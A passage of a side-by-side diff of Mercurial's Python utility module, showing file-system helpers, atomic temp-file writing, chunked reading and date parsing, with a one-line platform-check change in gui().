1382 1382 fp = posixfile(pathname)
1383 1383 r = fp.read()
1384 1384 fp.close()
1385 1385 return r
1386 1386
1387 1387 def fstat(fp):
1388 1388 '''stat file object that may not have fileno method.'''
1389 1389 try:
1390 1390 return os.fstat(fp.fileno())
1391 1391 except AttributeError:
1392 1392 return os.stat(fp.name)
1393 1393
1394 1394 # File system features
1395 1395
1396 1396 def fscasesensitive(path):
1397 1397 """
1398 1398 Return true if the given path is on a case-sensitive filesystem
1399 1399
1400 1400 Requires a path (like /foo/.hg) ending with a foldable final
1401 1401 directory component.
1402 1402 """
1403 1403 s1 = os.lstat(path)
1404 1404 d, b = os.path.split(path)
1405 1405 b2 = b.upper()
1406 1406 if b == b2:
1407 1407 b2 = b.lower()
1408 1408 if b == b2:
1409 1409 return True # no evidence against case sensitivity
1410 1410 p2 = os.path.join(d, b2)
1411 1411 try:
1412 1412 s2 = os.lstat(p2)
1413 1413 if s2 == s1:
1414 1414 return False
1415 1415 return True
1416 1416 except OSError:
1417 1417 return True
1418 1418
1419 1419 try:
1420 1420 import re2
1421 1421 _re2 = None
1422 1422 except ImportError:
1423 1423 _re2 = False
1424 1424
1425 1425 class _re(object):
1426 1426 def _checkre2(self):
1427 1427 global _re2
1428 1428 try:
1429 1429 # check if match works, see issue3964
1430 1430 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1431 1431 except ImportError:
1432 1432 _re2 = False
1433 1433
1434 1434 def compile(self, pat, flags=0):
1435 1435 '''Compile a regular expression, using re2 if possible
1436 1436
1437 1437 For best performance, use only re2-compatible regexp features. The
1438 1438 only flags from the re module that are re2-compatible are
1439 1439 IGNORECASE and MULTILINE.'''
1440 1440 if _re2 is None:
1441 1441 self._checkre2()
1442 1442 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1443 1443 if flags & remod.IGNORECASE:
1444 1444 pat = '(?i)' + pat
1445 1445 if flags & remod.MULTILINE:
1446 1446 pat = '(?m)' + pat
1447 1447 try:
1448 1448 return re2.compile(pat)
1449 1449 except re2.error:
1450 1450 pass
1451 1451 return remod.compile(pat, flags)
1452 1452
1453 1453 @propertycache
1454 1454 def escape(self):
1455 1455 '''Return the version of escape corresponding to self.compile.
1456 1456
1457 1457 This is imperfect because whether re2 or re is used for a particular
1458 1458 function depends on the flags, etc, but it's the best we can do.
1459 1459 '''
1460 1460 global _re2
1461 1461 if _re2 is None:
1462 1462 self._checkre2()
1463 1463 if _re2:
1464 1464 return re2.escape
1465 1465 else:
1466 1466 return remod.escape
1467 1467
1468 1468 re = _re()
1469 1469
1470 1470 _fspathcache = {}
1471 1471 def fspath(name, root):
1472 1472 '''Get name in the case stored in the filesystem
1473 1473
1474 1474 The name should be relative to root, and be normcase-ed for efficiency.
1475 1475
1476 1476 Note that this function is unnecessary, and should not be
1477 1477 called, for case-sensitive filesystems (simply because it's expensive).
1478 1478
1479 1479 The root should be normcase-ed, too.
1480 1480 '''
1481 1481 def _makefspathcacheentry(dir):
1482 1482 return dict((normcase(n), n) for n in os.listdir(dir))
1483 1483
1484 1484 seps = pycompat.ossep
1485 1485 if pycompat.osaltsep:
1486 1486 seps = seps + pycompat.osaltsep
1487 1487 # Protect backslashes. This gets silly very quickly.
1488 1488 seps.replace('\\','\\\\')
1489 1489 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1490 1490 dir = os.path.normpath(root)
1491 1491 result = []
1492 1492 for part, sep in pattern.findall(name):
1493 1493 if sep:
1494 1494 result.append(sep)
1495 1495 continue
1496 1496
1497 1497 if dir not in _fspathcache:
1498 1498 _fspathcache[dir] = _makefspathcacheentry(dir)
1499 1499 contents = _fspathcache[dir]
1500 1500
1501 1501 found = contents.get(part)
1502 1502 if not found:
1503 1503 # retry "once per directory" per "dirstate.walk" which
1504 1504 # may take place for each patches of "hg qpush", for example
1505 1505 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1506 1506 found = contents.get(part)
1507 1507
1508 1508 result.append(found or part)
1509 1509 dir = os.path.join(dir, part)
1510 1510
1511 1511 return ''.join(result)
1512 1512
1513 1513 def getfstype(dirpath):
1514 1514 '''Get the filesystem type name from a directory (best-effort)
1515 1515
1516 1516 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1517 1517 '''
1518 1518 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1519 1519
1520 1520 def checknlink(testfile):
1521 1521 '''check whether hardlink count reporting works properly'''
1522 1522
1523 1523 # testfile may be open, so we need a separate file for checking to
1524 1524 # work around issue2543 (or testfile may get lost on Samba shares)
1525 1525 f1, f2, fp = None, None, None
1526 1526 try:
1527 1527 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1528 1528 suffix='1~', dir=os.path.dirname(testfile))
1529 1529 os.close(fd)
1530 1530 f2 = '%s2~' % f1[:-2]
1531 1531
1532 1532 oslink(f1, f2)
1533 1533 # nlinks() may behave differently for files on Windows shares if
1534 1534 # the file is open.
1535 1535 fp = posixfile(f2)
1536 1536 return nlinks(f2) > 1
1537 1537 except OSError:
1538 1538 return False
1539 1539 finally:
1540 1540 if fp is not None:
1541 1541 fp.close()
1542 1542 for f in (f1, f2):
1543 1543 try:
1544 1544 if f is not None:
1545 1545 os.unlink(f)
1546 1546 except OSError:
1547 1547 pass
1548 1548
1549 1549 def endswithsep(path):
1550 1550 '''Check path ends with os.sep or os.altsep.'''
1551 1551 return (path.endswith(pycompat.ossep)
1552 1552 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1553 1553
1554 1554 def splitpath(path):
1555 1555 '''Split path by os.sep.
1556 1556 Note that this function does not use os.altsep because this is
1557 1557 an alternative of simple "xxx.split(os.sep)".
1558 1558 It is recommended to use os.path.normpath() before using this
1559 1559 function if need.'''
1560 1560 return path.split(pycompat.ossep)
1561 1561
1562 1562 def gui():
1563 1563 '''Are we running in a GUI?'''
1564 if pycompat.sysplatform == 'darwin':
1564 if pycompat.isdarwin:
1565 1565 if 'SSH_CONNECTION' in encoding.environ:
1566 1566 # handle SSH access to a box where the user is logged in
1567 1567 return False
1568 1568 elif getattr(osutil, 'isgui', None):
1569 1569 # check if a CoreGraphics session is available
1570 1570 return osutil.isgui()
1571 1571 else:
1572 1572 # pure build; use a safe default
1573 1573 return True
1574 1574 else:
1575 1575 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1576 1576
1577 1577 def mktempcopy(name, emptyok=False, createmode=None):
1578 1578 """Create a temporary file with the same contents from name
1579 1579
1580 1580 The permission bits are copied from the original file.
1581 1581
1582 1582 If the temporary file is going to be truncated immediately, you
1583 1583 can use emptyok=True as an optimization.
1584 1584
1585 1585 Returns the name of the temporary file.
1586 1586 """
1587 1587 d, fn = os.path.split(name)
1588 1588 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1589 1589 os.close(fd)
1590 1590 # Temporary files are created with mode 0600, which is usually not
1591 1591 # what we want. If the original file already exists, just copy
1592 1592 # its mode. Otherwise, manually obey umask.
1593 1593 copymode(name, temp, createmode)
1594 1594 if emptyok:
1595 1595 return temp
1596 1596 try:
1597 1597 try:
1598 1598 ifp = posixfile(name, "rb")
1599 1599 except IOError as inst:
1600 1600 if inst.errno == errno.ENOENT:
1601 1601 return temp
1602 1602 if not getattr(inst, 'filename', None):
1603 1603 inst.filename = name
1604 1604 raise
1605 1605 ofp = posixfile(temp, "wb")
1606 1606 for chunk in filechunkiter(ifp):
1607 1607 ofp.write(chunk)
1608 1608 ifp.close()
1609 1609 ofp.close()
1610 1610 except: # re-raises
1611 1611 try:
1612 1612 os.unlink(temp)
1613 1613 except OSError:
1614 1614 pass
1615 1615 raise
1616 1616 return temp
1617 1617
1618 1618 class filestat(object):
1619 1619 """help to exactly detect change of a file
1620 1620
1621 1621 'stat' attribute is result of 'os.stat()' if specified 'path'
1622 1622 exists. Otherwise, it is None. This can avoid preparative
1623 1623 'exists()' examination on client side of this class.
1624 1624 """
1625 1625 def __init__(self, stat):
1626 1626 self.stat = stat
1627 1627
1628 1628 @classmethod
1629 1629 def frompath(cls, path):
1630 1630 try:
1631 1631 stat = os.stat(path)
1632 1632 except OSError as err:
1633 1633 if err.errno != errno.ENOENT:
1634 1634 raise
1635 1635 stat = None
1636 1636 return cls(stat)
1637 1637
1638 1638 @classmethod
1639 1639 def fromfp(cls, fp):
1640 1640 stat = os.fstat(fp.fileno())
1641 1641 return cls(stat)
1642 1642
1643 1643 __hash__ = object.__hash__
1644 1644
1645 1645 def __eq__(self, old):
1646 1646 try:
1647 1647 # if ambiguity between stat of new and old file is
1648 1648 # avoided, comparison of size, ctime and mtime is enough
1649 1649 # to exactly detect change of a file regardless of platform
1650 1650 return (self.stat.st_size == old.stat.st_size and
1651 1651 self.stat.st_ctime == old.stat.st_ctime and
1652 1652 self.stat.st_mtime == old.stat.st_mtime)
1653 1653 except AttributeError:
1654 1654 pass
1655 1655 try:
1656 1656 return self.stat is None and old.stat is None
1657 1657 except AttributeError:
1658 1658 return False
1659 1659
1660 1660 def isambig(self, old):
1661 1661 """Examine whether new (= self) stat is ambiguous against old one
1662 1662
1663 1663 "S[N]" below means stat of a file at N-th change:
1664 1664
1665 1665 - S[n-1].ctime < S[n].ctime: can detect change of a file
1666 1666 - S[n-1].ctime == S[n].ctime
1667 1667 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1668 1668 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1669 1669 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1670 1670 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1671 1671
1672 1672 Case (*2) above means that a file was changed twice or more at
1673 1673 same time in sec (= S[n-1].ctime), and comparison of timestamp
1674 1674 is ambiguous.
1675 1675
1676 1676 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1677 1677 timestamp is ambiguous".
1678 1678
1679 1679 But advancing mtime only in case (*2) doesn't work as
1680 1680 expected, because naturally advanced S[n].mtime in case (*1)
1681 1681 might be equal to manually advanced S[n-1 or earlier].mtime.
1682 1682
1683 1683 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1684 1684 treated as ambiguous regardless of mtime, to avoid overlooking
1685 1685 by confliction between such mtime.
1686 1686
1687 1687 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1688 1688 S[n].mtime", even if size of a file isn't changed.
1689 1689 """
1690 1690 try:
1691 1691 return (self.stat.st_ctime == old.stat.st_ctime)
1692 1692 except AttributeError:
1693 1693 return False
1694 1694
1695 1695 def avoidambig(self, path, old):
1696 1696 """Change file stat of specified path to avoid ambiguity
1697 1697
1698 1698 'old' should be previous filestat of 'path'.
1699 1699
1700 1700 This skips avoiding ambiguity, if a process doesn't have
1701 1701 appropriate privileges for 'path'. This returns False in this
1702 1702 case.
1703 1703
1704 1704 Otherwise, this returns True, as "ambiguity is avoided".
1705 1705 """
1706 1706 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1707 1707 try:
1708 1708 os.utime(path, (advanced, advanced))
1709 1709 except OSError as inst:
1710 1710 if inst.errno == errno.EPERM:
1711 1711 # utime() on the file created by another user causes EPERM,
1712 1712 # if a process doesn't have appropriate privileges
1713 1713 return False
1714 1714 raise
1715 1715 return True
1716 1716
1717 1717 def __ne__(self, other):
1718 1718 return not self == other
1719 1719
1720 1720 class atomictempfile(object):
1721 1721 '''writable file object that atomically updates a file
1722 1722
1723 1723 All writes will go to a temporary copy of the original file. Call
1724 1724 close() when you are done writing, and atomictempfile will rename
1725 1725 the temporary copy to the original name, making the changes
1726 1726 visible. If the object is destroyed without being closed, all your
1727 1727 writes are discarded.
1728 1728
1729 1729 checkambig argument of constructor is used with filestat, and is
1730 1730 useful only if target file is guarded by any lock (e.g. repo.lock
1731 1731 or repo.wlock).
1732 1732 '''
1733 1733 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1734 1734 self.__name = name # permanent name
1735 1735 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1736 1736 createmode=createmode)
1737 1737 self._fp = posixfile(self._tempname, mode)
1738 1738 self._checkambig = checkambig
1739 1739
1740 1740 # delegated methods
1741 1741 self.read = self._fp.read
1742 1742 self.write = self._fp.write
1743 1743 self.seek = self._fp.seek
1744 1744 self.tell = self._fp.tell
1745 1745 self.fileno = self._fp.fileno
1746 1746
1747 1747 def close(self):
1748 1748 if not self._fp.closed:
1749 1749 self._fp.close()
1750 1750 filename = localpath(self.__name)
1751 1751 oldstat = self._checkambig and filestat.frompath(filename)
1752 1752 if oldstat and oldstat.stat:
1753 1753 rename(self._tempname, filename)
1754 1754 newstat = filestat.frompath(filename)
1755 1755 if newstat.isambig(oldstat):
1756 1756 # stat of changed file is ambiguous to original one
1757 1757 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1758 1758 os.utime(filename, (advanced, advanced))
1759 1759 else:
1760 1760 rename(self._tempname, filename)
1761 1761
1762 1762 def discard(self):
1763 1763 if not self._fp.closed:
1764 1764 try:
1765 1765 os.unlink(self._tempname)
1766 1766 except OSError:
1767 1767 pass
1768 1768 self._fp.close()
1769 1769
1770 1770 def __del__(self):
1771 1771 if safehasattr(self, '_fp'): # constructor actually did something
1772 1772 self.discard()
1773 1773
1774 1774 def __enter__(self):
1775 1775 return self
1776 1776
1777 1777 def __exit__(self, exctype, excvalue, traceback):
1778 1778 if exctype is not None:
1779 1779 self.discard()
1780 1780 else:
1781 1781 self.close()
1782 1782
1783 1783 def unlinkpath(f, ignoremissing=False):
1784 1784 """unlink and remove the directory if it is empty"""
1785 1785 if ignoremissing:
1786 1786 tryunlink(f)
1787 1787 else:
1788 1788 unlink(f)
1789 1789 # try removing directories that might now be empty
1790 1790 try:
1791 1791 removedirs(os.path.dirname(f))
1792 1792 except OSError:
1793 1793 pass
1794 1794
1795 1795 def tryunlink(f):
1796 1796 """Attempt to remove a file, ignoring ENOENT errors."""
1797 1797 try:
1798 1798 unlink(f)
1799 1799 except OSError as e:
1800 1800 if e.errno != errno.ENOENT:
1801 1801 raise
1802 1802
1803 1803 def makedirs(name, mode=None, notindexed=False):
1804 1804 """recursive directory creation with parent mode inheritance
1805 1805
1806 1806 Newly created directories are marked as "not to be indexed by
1807 1807 the content indexing service", if ``notindexed`` is specified
1808 1808 for "write" mode access.
1809 1809 """
1810 1810 try:
1811 1811 makedir(name, notindexed)
1812 1812 except OSError as err:
1813 1813 if err.errno == errno.EEXIST:
1814 1814 return
1815 1815 if err.errno != errno.ENOENT or not name:
1816 1816 raise
1817 1817 parent = os.path.dirname(os.path.abspath(name))
1818 1818 if parent == name:
1819 1819 raise
1820 1820 makedirs(parent, mode, notindexed)
1821 1821 try:
1822 1822 makedir(name, notindexed)
1823 1823 except OSError as err:
1824 1824 # Catch EEXIST to handle races
1825 1825 if err.errno == errno.EEXIST:
1826 1826 return
1827 1827 raise
1828 1828 if mode is not None:
1829 1829 os.chmod(name, mode)
1830 1830
1831 1831 def readfile(path):
1832 1832 with open(path, 'rb') as fp:
1833 1833 return fp.read()
1834 1834
1835 1835 def writefile(path, text):
1836 1836 with open(path, 'wb') as fp:
1837 1837 fp.write(text)
1838 1838
1839 1839 def appendfile(path, text):
1840 1840 with open(path, 'ab') as fp:
1841 1841 fp.write(text)
1842 1842
1843 1843 class chunkbuffer(object):
1844 1844 """Allow arbitrary sized chunks of data to be efficiently read from an
1845 1845 iterator over chunks of arbitrary size."""
1846 1846
1847 1847 def __init__(self, in_iter):
1848 1848 """in_iter is the iterator that's iterating over the input chunks."""
1849 1849 def splitbig(chunks):
1850 1850 for chunk in chunks:
1851 1851 if len(chunk) > 2**20:
1852 1852 pos = 0
1853 1853 while pos < len(chunk):
1854 1854 end = pos + 2 ** 18
1855 1855 yield chunk[pos:end]
1856 1856 pos = end
1857 1857 else:
1858 1858 yield chunk
1859 1859 self.iter = splitbig(in_iter)
1860 1860 self._queue = collections.deque()
1861 1861 self._chunkoffset = 0
1862 1862
1863 1863 def read(self, l=None):
1864 1864 """Read L bytes of data from the iterator of chunks of data.
1865 1865 Returns less than L bytes if the iterator runs dry.
1866 1866
1867 1867 If size parameter is omitted, read everything"""
1868 1868 if l is None:
1869 1869 return ''.join(self.iter)
1870 1870
1871 1871 left = l
1872 1872 buf = []
1873 1873 queue = self._queue
1874 1874 while left > 0:
1875 1875 # refill the queue
1876 1876 if not queue:
1877 1877 target = 2**18
1878 1878 for chunk in self.iter:
1879 1879 queue.append(chunk)
1880 1880 target -= len(chunk)
1881 1881 if target <= 0:
1882 1882 break
1883 1883 if not queue:
1884 1884 break
1885 1885
1886 1886 # The easy way to do this would be to queue.popleft(), modify the
1887 1887 # chunk (if necessary), then queue.appendleft(). However, for cases
1888 1888 # where we read partial chunk content, this incurs 2 dequeue
1889 1889 # mutations and creates a new str for the remaining chunk in the
1890 1890 # queue. Our code below avoids this overhead.
1891 1891
1892 1892 chunk = queue[0]
1893 1893 chunkl = len(chunk)
1894 1894 offset = self._chunkoffset
1895 1895
1896 1896 # Use full chunk.
1897 1897 if offset == 0 and left >= chunkl:
1898 1898 left -= chunkl
1899 1899 queue.popleft()
1900 1900 buf.append(chunk)
1901 1901 # self._chunkoffset remains at 0.
1902 1902 continue
1903 1903
1904 1904 chunkremaining = chunkl - offset
1905 1905
1906 1906 # Use all of unconsumed part of chunk.
1907 1907 if left >= chunkremaining:
1908 1908 left -= chunkremaining
1909 1909 queue.popleft()
1910 1910 # offset == 0 is enabled by block above, so this won't merely
1911 1911 # copy via ``chunk[0:]``.
1912 1912 buf.append(chunk[offset:])
1913 1913 self._chunkoffset = 0
1914 1914
1915 1915 # Partial chunk needed.
1916 1916 else:
1917 1917 buf.append(chunk[offset:offset + left])
1918 1918 self._chunkoffset += left
1919 1919 left -= chunkremaining
1920 1920
1921 1921 return ''.join(buf)
1922 1922
1923 1923 def filechunkiter(f, size=131072, limit=None):
1924 1924 """Create a generator that produces the data in the file size
1925 1925 (default 131072) bytes at a time, up to optional limit (default is
1926 1926 to read all data). Chunks may be less than size bytes if the
1927 1927 chunk is the last chunk in the file, or the file is a socket or
1928 1928 some other type of file that sometimes reads less data than is
1929 1929 requested."""
1930 1930 assert size >= 0
1931 1931 assert limit is None or limit >= 0
1932 1932 while True:
1933 1933 if limit is None:
1934 1934 nbytes = size
1935 1935 else:
1936 1936 nbytes = min(limit, size)
1937 1937 s = nbytes and f.read(nbytes)
1938 1938 if not s:
1939 1939 break
1940 1940 if limit:
1941 1941 limit -= len(s)
1942 1942 yield s
1943 1943
1944 1944 def makedate(timestamp=None):
1945 1945 '''Return a unix timestamp (or the current time) as a (unixtime,
1946 1946 offset) tuple based off the local timezone.'''
1947 1947 if timestamp is None:
1948 1948 timestamp = time.time()
1949 1949 if timestamp < 0:
1950 1950 hint = _("check your clock")
1951 1951 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1952 1952 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1953 1953 datetime.datetime.fromtimestamp(timestamp))
1954 1954 tz = delta.days * 86400 + delta.seconds
1955 1955 return timestamp, tz
1956 1956
1957 1957 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1958 1958 """represent a (unixtime, offset) tuple as a localized time.
1959 1959 unixtime is seconds since the epoch, and offset is the time zone's
1960 1960 number of seconds away from UTC.
1961 1961
1962 1962 >>> datestr((0, 0))
1963 1963 'Thu Jan 01 00:00:00 1970 +0000'
1964 1964 >>> datestr((42, 0))
1965 1965 'Thu Jan 01 00:00:42 1970 +0000'
1966 1966 >>> datestr((-42, 0))
1967 1967 'Wed Dec 31 23:59:18 1969 +0000'
1968 1968 >>> datestr((0x7fffffff, 0))
1969 1969 'Tue Jan 19 03:14:07 2038 +0000'
1970 1970 >>> datestr((-0x80000000, 0))
1971 1971 'Fri Dec 13 20:45:52 1901 +0000'
1972 1972 """
1973 1973 t, tz = date or makedate()
1974 1974 if "%1" in format or "%2" in format or "%z" in format:
1975 1975 sign = (tz > 0) and "-" or "+"
1976 1976 minutes = abs(tz) // 60
1977 1977 q, r = divmod(minutes, 60)
1978 1978 format = format.replace("%z", "%1%2")
1979 1979 format = format.replace("%1", "%c%02d" % (sign, q))
1980 1980 format = format.replace("%2", "%02d" % r)
1981 1981 d = t - tz
1982 1982 if d > 0x7fffffff:
1983 1983 d = 0x7fffffff
1984 1984 elif d < -0x80000000:
1985 1985 d = -0x80000000
1986 1986 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1987 1987 # because they use the gmtime() system call which is buggy on Windows
1988 1988 # for negative values.
1989 1989 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1990 1990 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1991 1991 return s
1992 1992
1993 1993 def shortdate(date=None):
1994 1994 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1995 1995 return datestr(date, format='%Y-%m-%d')
1996 1996
1997 1997 def parsetimezone(s):
1998 1998 """find a trailing timezone, if any, in string, and return a
1999 1999 (offset, remainder) pair"""
2000 2000
2001 2001 if s.endswith("GMT") or s.endswith("UTC"):
2002 2002 return 0, s[:-3].rstrip()
2003 2003
2004 2004 # Unix-style timezones [+-]hhmm
2005 2005 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2006 2006 sign = (s[-5] == "+") and 1 or -1
2007 2007 hours = int(s[-4:-2])
2008 2008 minutes = int(s[-2:])
2009 2009 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2010 2010
2011 2011 # ISO8601 trailing Z
2012 2012 if s.endswith("Z") and s[-2:-1].isdigit():
2013 2013 return 0, s[:-1]
2014 2014
2015 2015 # ISO8601-style [+-]hh:mm
2016 2016 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2017 2017 s[-5:-3].isdigit() and s[-2:].isdigit()):
2018 2018 sign = (s[-6] == "+") and 1 or -1
2019 2019 hours = int(s[-5:-3])
2020 2020 minutes = int(s[-2:])
2021 2021 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2022 2022
2023 2023 return None, s
2024 2024
2025 2025 def strdate(string, format, defaults=None):
2026 2026 """parse a localized time string and return a (unixtime, offset) tuple.
2027 2027 if the string cannot be parsed, ValueError is raised."""
2028 2028 if defaults is None:
2029 2029 defaults = {}
2030 2030
2031 2031 # NOTE: unixtime = localunixtime + offset
2032 2032 offset, date = parsetimezone(string)
2033 2033
2034 2034 # add missing elements from defaults
2035 2035 usenow = False # default to using biased defaults
2036 2036 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2037 2037 part = pycompat.bytestr(part)
2038 2038 found = [True for p in part if ("%"+p) in format]
2039 2039 if not found:
2040 2040 date += "@" + defaults[part][usenow]
2041 2041 format += "@%" + part[0]
2042 2042 else:
2043 2043 # We've found a specific time element, less specific time
2044 2044 # elements are relative to today
2045 2045 usenow = True
2046 2046
2047 2047 timetuple = time.strptime(encoding.strfromlocal(date),
2048 2048 encoding.strfromlocal(format))
2049 2049 localunixtime = int(calendar.timegm(timetuple))
2050 2050 if offset is None:
2051 2051 # local timezone
2052 2052 unixtime = int(time.mktime(timetuple))
2053 2053 offset = unixtime - localunixtime
2054 2054 else:
2055 2055 unixtime = localunixtime + offset
2056 2056 return unixtime, offset
2057 2057
2058 2058 def parsedate(date, formats=None, bias=None):
2059 2059 """parse a localized date/time and return a (unixtime, offset) tuple.
2060 2060
2061 2061 The date may be a "unixtime offset" string or in one of the specified
2062 2062 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2063 2063
2064 2064 >>> parsedate(b' today ') == parsedate(
2065 2065 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2066 2066 True
2067 2067 >>> parsedate(b'yesterday ') == parsedate(
2068 2068 ... (datetime.date.today() - datetime.timedelta(days=1)
2069 2069 ... ).strftime('%b %d').encode('ascii'))
2070 2070 True
2071 2071 >>> now, tz = makedate()
2072 2072 >>> strnow, strtz = parsedate(b'now')
2073 2073 >>> (strnow - now) < 1
2074 2074 True
2075 2075 >>> tz == strtz
2076 2076 True
2077 2077 """
2078 2078 if bias is None:
2079 2079 bias = {}
2080 2080 if not date:
2081 2081 return 0, 0
2082 2082 if isinstance(date, tuple) and len(date) == 2:
2083 2083 return date
2084 2084 if not formats:
2085 2085 formats = defaultdateformats
2086 2086 date = date.strip()
2087 2087
2088 2088 if date == 'now' or date == _('now'):
2089 2089 return makedate()
2090 2090 if date == 'today' or date == _('today'):
2091 2091 date = datetime.date.today().strftime(r'%b %d')
2092 2092 date = encoding.strtolocal(date)
2093 2093 elif date == 'yesterday' or date == _('yesterday'):
2094 2094 date = (datetime.date.today() -
2095 2095 datetime.timedelta(days=1)).strftime(r'%b %d')
2096 2096 date = encoding.strtolocal(date)
2097 2097
2098 2098 try:
2099 2099 when, offset = map(int, date.split(' '))
2100 2100 except ValueError:
2101 2101 # fill out defaults
2102 2102 now = makedate()
2103 2103 defaults = {}
2104 2104 for part in ("d", "mb", "yY", "HI", "M", "S"):
2105 2105 # this piece is for rounding the specific end of unknowns
2106 2106 b = bias.get(part)
2107 2107 if b is None:
2108 2108 if part[0:1] in "HMS":
2109 2109 b = "00"
2110 2110 else:
2111 2111 b = "0"
2112 2112
2113 2113 # this piece is for matching the generic end to today's date
2114 2114 n = datestr(now, "%" + part[0:1])
2115 2115
2116 2116 defaults[part] = (b, n)
2117 2117
2118 2118 for format in formats:
2119 2119 try:
2120 2120 when, offset = strdate(date, format, defaults)
2121 2121 except (ValueError, OverflowError):
2122 2122 pass
2123 2123 else:
2124 2124 break
2125 2125 else:
2126 2126 raise error.ParseError(_('invalid date: %r') % date)
2127 2127 # validate explicit (probably user-specified) date and
2128 2128 # time zone offset. values must fit in signed 32 bits for
2129 2129 # current 32-bit linux runtimes. timezones go from UTC-12
2130 2130 # to UTC+14
2131 2131 if when < -0x80000000 or when > 0x7fffffff:
2132 2132 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2133 2133 if offset < -50400 or offset > 43200:
2134 2134 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2135 2135 return when, offset
2136 2136
2137 2137 def matchdate(date):
2138 2138 """Return a function that matches a given date match specifier
2139 2139
2140 2140 Formats include:
2141 2141
2142 2142 '{date}' match a given date to the accuracy provided
2143 2143
2144 2144 '<{date}' on or before a given date
2145 2145
2146 2146 '>{date}' on or after a given date
2147 2147
2148 2148 >>> p1 = parsedate(b"10:29:59")
2149 2149 >>> p2 = parsedate(b"10:30:00")
2150 2150 >>> p3 = parsedate(b"10:30:59")
2151 2151 >>> p4 = parsedate(b"10:31:00")
2152 2152 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2153 2153 >>> f = matchdate(b"10:30")
2154 2154 >>> f(p1[0])
2155 2155 False
2156 2156 >>> f(p2[0])
2157 2157 True
2158 2158 >>> f(p3[0])
2159 2159 True
2160 2160 >>> f(p4[0])
2161 2161 False
2162 2162 >>> f(p5[0])
2163 2163 False
2164 2164 """
2165 2165
2166 2166 def lower(date):
2167 2167 d = {'mb': "1", 'd': "1"}
2168 2168 return parsedate(date, extendeddateformats, d)[0]
2169 2169
2170 2170 def upper(date):
2171 2171 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2172 2172 for days in ("31", "30", "29"):
2173 2173 try:
2174 2174 d["d"] = days
2175 2175 return parsedate(date, extendeddateformats, d)[0]
2176 2176 except Abort:
2177 2177 pass
2178 2178 d["d"] = "28"
2179 2179 return parsedate(date, extendeddateformats, d)[0]
2180 2180
2181 2181 date = date.strip()
2182 2182
2183 2183 if not date:
2184 2184 raise Abort(_("dates cannot consist entirely of whitespace"))
2185 2185 elif date[0] == "<":
2186 2186 if not date[1:]:
2187 2187 raise Abort(_("invalid day spec, use '<DATE'"))
2188 2188 when = upper(date[1:])
2189 2189 return lambda x: x <= when
2190 2190 elif date[0] == ">":
2191 2191 if not date[1:]:
2192 2192 raise Abort(_("invalid day spec, use '>DATE'"))
2193 2193 when = lower(date[1:])
2194 2194 return lambda x: x >= when
2195 2195 elif date[0] == "-":
2196 2196 try:
2197 2197 days = int(date[1:])
2198 2198 except ValueError:
2199 2199 raise Abort(_("invalid day spec: %s") % date[1:])
2200 2200 if days < 0:
2201 2201 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2202 2202 % date[1:])
2203 2203 when = makedate()[0] - days * 3600 * 24
2204 2204 return lambda x: x >= when
2205 2205 elif " to " in date:
2206 2206 a, b = date.split(" to ")
2207 2207 start, stop = lower(a), upper(b)
2208 2208 return lambda x: x >= start and x <= stop
2209 2209 else:
2210 2210 start, stop = lower(date), upper(date)
2211 2211 return lambda x: x >= start and x <= stop
2212 2212
2213 2213 def stringmatcher(pattern, casesensitive=True):
2214 2214 """
2215 2215 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2216 2216 returns the matcher name, pattern, and matcher function.
2217 2217 missing or unknown prefixes are treated as literal matches.
2218 2218
2219 2219 helper for tests:
2220 2220 >>> def test(pattern, *tests):
2221 2221 ... kind, pattern, matcher = stringmatcher(pattern)
2222 2222 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2223 2223 >>> def itest(pattern, *tests):
2224 2224 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2225 2225 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2226 2226
2227 2227 exact matching (no prefix):
2228 2228 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2229 2229 ('literal', 'abcdefg', [False, False, True])
2230 2230
2231 2231 regex matching ('re:' prefix)
2232 2232 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2233 2233 ('re', 'a.+b', [False, False, True])
